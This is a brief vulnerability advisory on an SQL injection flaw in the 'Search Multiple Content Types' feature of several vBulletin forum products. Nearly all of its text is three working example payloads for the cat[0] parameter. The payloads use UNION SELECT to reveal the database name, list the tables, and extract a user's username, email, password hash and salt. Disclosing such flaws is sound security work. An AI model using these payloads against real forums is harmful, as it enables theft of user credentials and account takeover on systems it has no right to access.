Multiple vBulletin Products 'Search Multiple Content Types' SQL Injection Vulnerability

Multiple vBulletin Products 'Search Multiple Content Types' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example data are available:

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#